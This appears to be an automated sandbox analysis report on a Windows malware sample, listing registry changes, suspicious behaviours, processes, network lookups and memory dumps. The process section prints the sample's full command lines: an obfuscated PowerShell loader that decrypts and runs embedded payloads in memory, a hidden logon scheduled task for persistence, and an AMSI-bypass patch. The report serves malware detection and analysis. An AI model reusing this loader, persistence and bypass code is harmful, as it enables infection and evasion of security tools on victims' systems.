| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionTime = 71918e1427bcda01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_746_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_746.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_746.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eGqSGZBGdVbv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CAeflCpPTyWVIO,[Parameter(Position=1)][Type]$QvZruXksXF)$LmyQGPXNTGw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+''+[Char](108)+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'Ty'+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'led'+[Char](44)+''+'A'+'ns'+'i'+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$LmyQGPXNTGw.DefineConstructor('R'+'T'+'S'+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+'am'+'e'+','+[Char](72)+'ide'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$CAeflCpPTyWVIO).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+'e'+''+[Char](100)+'');$LmyQGPXNTGw.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+'y'+[Char](83)+'i'+[Char](103)+',N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+'al',$QvZruXksXF,$CAeflCpPTyWVIO).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');Write-Output $LmyQGPXNTGw.CreateType();}$UsahYRRySJuYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+[Char](118)+'e'+'M'+''+'e'+''+'t'+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$gyJpBvzNLaTuww=$UsahYRRySJuYU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$qvOVvokablYnezmsqlh=eGqSGZBGdVbv @([String])([IntPtr]);$MkNymqhlJOcqZdIELOWyaQ=eGqSGZBGdVbv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LfaUNdlJUrJ=$UsahYRRySJuYU.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'leH'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$KvXpWfAAaygwgc=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$LfaUNdlJUrJ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+'r'+'y'+'A')));$ibJwPZxTwmaovywto=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$LfaUNdlJUrJ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'Pr'+'o'+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$wCWqDtL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KvXpWfAAaygwgc,$qvOVvokablYnezmsqlh).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'dl'+[Char](108)+'');$zrKshOyzdaAvuDYzN=$gyJpBvzNLaTuww.Invoke($Null,@([Object]$wCWqDtL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+[Char](114)+'')));$qmybuZqpoA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ibJwPZxTwmaovywto,$MkNymqhlJOcqZdIELOWyaQ).Invoke($zrKshOyzdaAvuDYzN,[uint32]8,4,[ref]$qmybuZqpoA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zrKshOyzdaAvuDYzN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ibJwPZxTwmaovywto,$MkNymqhlJOcqZdIELOWyaQ).Invoke($zrKshOyzdaAvuDYzN,[uint32]8,0x20,[ref]$qmybuZqpoA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'s'+[Char](120)+'rs'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d5e71b24-33a9-4da2-a51b-7cacd215aa63}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| IE | 52.111.236.22:443 | tcp |
Files
memory/4396-0-0x000000007503E000-0x000000007503F000-memory.dmp
memory/4396-1-0x0000000004820000-0x0000000004856000-memory.dmp
memory/4396-2-0x0000000004F60000-0x000000000558A000-memory.dmp
memory/4396-3-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/4396-4-0x0000000004E30000-0x0000000004E52000-memory.dmp
memory/4396-5-0x0000000004ED0000-0x0000000004F36000-memory.dmp
memory/4396-6-0x0000000005590000-0x00000000055F6000-memory.dmp
memory/4396-7-0x0000000075030000-0x00000000757E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pid0cumu.25u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4396-16-0x00000000057E0000-0x0000000005B37000-memory.dmp
memory/4396-17-0x0000000005BC0000-0x0000000005BDE000-memory.dmp
memory/4396-18-0x0000000005C70000-0x0000000005CBC000-memory.dmp
memory/4396-19-0x0000000006E00000-0x0000000006E46000-memory.dmp
memory/4396-20-0x00000000075E0000-0x0000000007C5A000-memory.dmp
memory/4396-21-0x0000000006F90000-0x0000000006FAA000-memory.dmp
memory/4396-22-0x0000000002700000-0x0000000002708000-memory.dmp
memory/4396-23-0x00000000070A0000-0x000000000710E000-memory.dmp
memory/4396-24-0x000000000A210000-0x000000000A7B6000-memory.dmp
memory/3244-26-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-27-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-28-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-37-0x0000000007AC0000-0x0000000007AF4000-memory.dmp
memory/3244-47-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-38-0x0000000071190000-0x00000000711DC000-memory.dmp
memory/3244-50-0x0000000075030000-0x00000000757E1000-memory.dmp
memory/3244-49-0x0000000007B00000-0x0000000007BA4000-memory.dmp
